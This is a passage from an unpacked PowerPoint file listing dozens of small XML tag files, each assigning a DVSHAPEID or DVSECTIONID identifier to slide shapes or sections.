<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="PVstFmeZFbADCK7WVM1n06"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag104.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="lEw7eV3Yf65l1rspaM6kCE"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag105.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="z4ZAniMMJL3JzNWx8jWGWt"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag106.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ygJGtwBehFtG5s8EyLctmk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag107.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="hhREtCENoVH5wIQHOgavto"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag108.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="fTIuptKbut6eYrOP3ZAuhy"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag109.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="YZVqNQWWiRQT1YWYca2dre"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="oP2pIhzqOomffMJobGx7WB"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag110.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="YhJpSYcbVZ7HUIyZGTeyaf"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag111.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="o5pQS4Mpr36K1EGnYXJ7WQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag112.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Mk4dpdt8ZS4JTEZ268ovx3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag113.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="A9HUjiVgO3ixj5MFEzWj4d"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag114.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="GhL2oWRBIriIJUwvUadJ40"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag115.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rllUgrtPzeZmtp9hUZodlQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag116.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="eAmR89EL5l9FQpGuGq7SR3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag117.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Jmq6mDfekQFA6KxoijaO8D"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag118.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="dNzJAqiX5sYaQ0q1N1vR0j"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag119.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="0giWWh8NI3U59CxC3PVnKd"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="7Zh0mnJPcxXhtguRpmTGSG"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag120.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BWTxXgw8ihDTNirDu1PiJV"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag121.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="fLQOtaYFWDyNEm2okRhzLD"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag122.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rfPebplUxstGG8G9MlaCk0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag123.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="l0E4A5GY0a9CjBYfZzk255"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag124.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jYGUHa4Vo8jrTPA6Ofdzri"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag125.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="w3O5axlBhiUfGFoGnvT5L1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag126.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jSH9ETK5OwD1sC6C0wzNQ0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag127.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="wE9VI8RHFmxuKWn0TsQcto"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag128.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BFdLAKvmvXail30JaCd7Qh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag129.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="tXR9fZD7XEx72tHWx6cjRz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BkSMneHn7yrNI37IUbHZbP"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag130.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ksAj0ahdYmykbgTqvvJoZw"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag131.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Y0V1Wiyq8TI2mgrCoimzhq"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag132.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="5wif0Q2wfUwWj2sLplz8mm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag133.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="VtTsbh9Z1CmzsdbakE81Ka"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag134.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="xK0z6WNMQpHBUYE6Qey3P0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag135.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="7apAVJ3JunBpJdTneRTSBE"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag136.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ZmFPrZXmvnpKW9sCbccfMX"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag137.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="SQidwdNUtGlxLDThuNOtUk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag138.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="c91uEe2lRAd1uPwetKzATI"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag139.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ppoOIUHprj2yD9c1zyR7PK"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="iYisUkgadgIqnX8zZu7Ppp"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag140.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="jJ94Kgj3TkqtKB5Pv8Dr9U"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag141.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ZWbn1ra0ILTE6FFD9q6npI"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag142.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="7apAVJ3JunBpJdTneRTSBE"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag143.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="A5vqaSZdlMugO0YrvrXZhw"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag144.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="3HVsJLbetx7sAj4vybKg1P"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag145.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="9lqEn0SMf0ueMs3QmoT1Bv"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag146.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="5wif0Q2wfUwWj2sLplz8mm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag147.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="zM12EhRCdglDgUl7Z1JILz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag148.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="HP91nAZyst9IWveYbLFCHg"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag149.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="BFMyphlxoDB05bTDTgDFOS"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="PFyrKHrIYTvM1UtVkn7Xkb"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag150.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="uxXQT1QY38SretfPbHcU4w"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag151.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="dAGEoAvjVPqRiXvySsAiw0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag152.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="7DXpn44WtTNYp0pRVh6E9Q"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag153.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Zvi0dCiScEWEOM5GaNk2yy"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag154.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="VcOA9wopjVjhEr6nQsDBG9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag155.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="1LbDMf7jk7irA6cDsLtNk1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag156.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="kx8DzNWRoXRMa3owK9i0Bc"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag157.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="YcR0bd0S8TO0qEu8GjnsIk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag158.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="La0aYDu11iGqcoKzouQv7K"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag159.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="zNV8eW1jukp8zVMyCIRwPX"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="5iF9AlbcRmpT8DUszyJvhO"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag160.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="YaCK1CtZC8tDD352Z3ROpu"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag161.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Ai4zm7HFBcvCPKwtUpQuHh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag162.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="EViItAINE0ytzkFsfliXwh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag163.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="80ekvw9rYUMjD9gDE6WOxu"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag164.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="4lacNs9ucKKnNht84cEc2D"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag165.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="HgGwbCHb0IJDWT9jIHitH2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag166.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ygmY9v2KaksqETwhgwN1J1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag167.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="EalAYKtWUzVEIp9csb8gyo"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag168.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="bvffNrqLGGjwCcDzxihdqS"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag169.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="uZb6734BSttfYPkIW1w8Tf"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="VBWe54aJHs4EAfMB75wL18"/>
</p:tagLst>
</file>

